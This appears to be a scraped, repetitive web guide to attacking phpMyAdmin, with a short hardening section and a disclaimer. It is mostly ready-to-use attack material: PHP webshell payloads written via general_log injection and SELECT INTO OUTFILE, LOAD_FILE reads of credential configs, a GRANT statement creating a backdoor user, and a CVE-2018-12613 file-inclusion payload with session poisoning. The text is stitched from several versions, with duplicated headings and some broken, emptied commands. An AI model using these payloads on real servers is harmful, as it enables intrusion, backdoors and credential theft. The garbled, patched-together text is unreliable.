Phpmyadmin Hacktricks Verified 【Firefox】

When secure_file_priv is NULL, use this method.

Verified technique:

SET GLOBAL general_log = 'ON';
SET GLOBAL general_log_file = '/var/www/html/shell.php';
SELECT "<?php system($_GET['c']); ?>";  -- This gets written to log file

Caveat: Requires MySQL SUPER privilege (often given to root user in phpMyAdmin).

The config.inc.php file contains database credentials and sometimes auth keys.

If you have file read (via SQL or LFI):

/var/lib/phpmyadmin/config.inc.php
/etc/phpmyadmin/config.inc.php
/usr/share/phpmyadmin/config.inc.php

Verified hunt:

LOAD_FILE('/etc/phpmyadmin/config.inc.php');

Look for $cfg['Servers'][$i]['password'].

Attackers first scan for the phpMyAdmin login page. Common URLs:

/phpmyadmin/
/pma/
/dbadmin/
/myadmin/
/phpMyAdmin/
/MySQL-Admin/
/phpmyadmin2/
/phpmyadmin3/
/pma_db/

Some setups hide it under a random or custom path, but default installations are predictable.

If current user has CREATE USER and GRANT privileges:

GRANT ALL PRIVILEGES ON *.* TO 'attacker'@'localhost' IDENTIFIED BY 'pass';
FLUSH PRIVILEGES;

In very old phpMyAdmin versions (pre-4.0), /setup/ was accessible and could rewrite config files, allowing authentication bypass or code injection.

| Attack | Mitigation | |--------|-------------| | File write RCE | Set secure_file_priv = "/tmp/" or empty string? Better to set a safe directory or NULL. | | General log injection | Monitor general_log variable changes; set read-only for web user. | | Brute force | Use $cfg['LoginCookieValidity'] = 900 + fail2ban on /phpmyadmin. | | LFI (old versions) | Upgrade to 5.2.1+; remove /doc/ and /changelog.php from production. |

If you have credentials, you can use SQL to write a webshell:

SELECT "<?php system($_GET['cmd']); ?>" INTO OUTFILE "/var/www/html/shell.php"

Requirements:

These techniques have been verified on:

Always obtain proper authorization before testing any of these techniques on non-owned systems.

This post is for educational and authorized security testing purposes only.

Mastering phpMyAdmin Pentesting: A "HackTricks Verified" Guide

phpMyAdmin is the ubiquitous web interface for managing MySQL and MariaDB databases. Because it sits directly on top of sensitive data, it is a primary target for security researchers and attackers alike. Drawing from the methodologies popularized by resources like HackTricks, this guide outlines the verified techniques for enumerating, exploiting, and securing phpMyAdmin installations. 1. Initial Reconnaissance & Version Fingerprinting

Before launching an attack, you must understand the environment. phpMyAdmin’s vulnerability profile changes drastically between versions.

Version Identification: Look at the footer of the login page or check /README or /Documentation.html.

Default Credentials: Many installations still use root with a blank password or admin / password.

Setup Directory: Check if the /setup/ directory is accessible. If left unconfigured, it can sometimes be used to trick the application into connecting to a remote, malicious database server. 2. Exploiting Authentication

If default credentials fail, the next step is bypassing or forcing entry. Dictionary Attacks

phpMyAdmin does not always have built-in rate limiting. Using tools like Burp Suite Intruder or THC-Hydra, you can perform a dictionary attack against the pma_username and pma_password fields. Information Schema Leakage

In some misconfigured environments, a "config" auth type might be used where the credentials are hardcoded. If you find a way to read config.inc.php (via Local File Inclusion), you gain instant access. 3. Post-Auth Exploitation: From SQL to RCE

Once you have authenticated access (even as a low-privilege user), your goal is to escalate to the underlying operating system. A. SELECT INTO OUTFILE (The Classic Web Shell) phpmyadmin hacktricks verified

If the MySQL user has the FILE privilege and you know the absolute path of the webroot, you can write a PHP shell directly to the server.

SELECT '' INTO OUTFILE '/var/www/html/shell.php'; Use code with caution.

Note: This requires the secure_file_priv variable to be empty or pointing to the webroot. B. CVE-2018-12613 (Local File Inclusion)

One of the most famous "HackTricks verified" vulnerabilities. In versions 4.8.0 through 4.8.1, a flaw in the page redirection logic allowed for LFI.The Payload:index.php?target=db_sql.php%253f/../../../../../../../../etc/passwdAttackers combine this with Session File Poisoning:

Run SELECT ''; to store the shell in your session file. Find your session ID (from the phpMyAdmin cookie).

Use the LFI to include /var/lib/php/sessions/sess_[YOUR_ID]. C. CVE-2016-5734 (RCE via Preg_Replace)

In phpMyAdmin 4.3.0 to 4.6.2, a vulnerability in the search feature allowed attackers to execute code through the PHP preg_replace function using the /e (eval) modifier. 4. Advanced Enumeration: HackTricks Style

If you are stuck within the database, look for these "Quick Wins":

User Table Extraction: Hunt for wp_users (WordPress) or users tables to dump hashes for other services.

Sensitive Configs: Query tables that might store API keys or plaintext credentials for integrated services.

UDF (User Defined Functions): If the server is running on Windows and you have high privileges, you can attempt to drop a DLL to gain OS-level execution. 5. Defensive Hardening (The "Verified" Fixes)

To prevent your server from appearing in a pentester's report, follow these industry standards:

Restrict Access by IP: Never leave phpMyAdmin open to the world. Use .htaccess or Nginx rules to allow only trusted IPs. When secure_file_priv is NULL, use this method

Change the Alias: Move the interface from /phpmyadmin to a random string like /secret_db_9921.

Disable Root Login: Force users to login via a non-root account and use sudo-like permissions within MySQL.

Update Religiously: Most RCE exploits target versions that are 5+ years old. Summary Table: phpMyAdmin Attack Vectors Requirement Default Creds Poor Configuration Full DB Access LFI (CVE-2018-12613) Version 4.8.x RCE via Session Poisoning SELECT INTO OUTFILE FILE Privilege + Known Path Setup Script Bypass Accessible /setup/ folder Config Manipulation

This guide follows the HackTricks methodology for pentesting phpMyAdmin

, a common web-based tool for managing MySQL and MariaDB databases. book.hacktricks.xyz 1. Initial Reconnaissance & Enumeration

Before attempting an exploit, identify the environment and version: Version Identification

: Look for version strings in the footer of the login page or in files like Absolute Path Leakage : Check for common error pages or use a SELECT @@datadir;

query once logged in to find where files are stored on the server. Sensitive Files : Search for config.inc.php

, which may contain database credentials or internal configuration secrets. 2. Authentication & Access If the instance is not publicly open, try the following: Default Credentials : Test common combinations like with an empty password. Brute-Forcing : Use tools like to test for weak administrative passwords. Credential Harvesting

: If you have access to the file system (e.g., via another vulnerability), check wp-config.php

(WordPress) or similar CMS configuration files for DB passwords. book.hacktricks.xyz 3. Exploitation Techniques (Verified)

The primary goal in phpMyAdmin pentesting is often to escalate from database access to Remote Code Execution (RCE)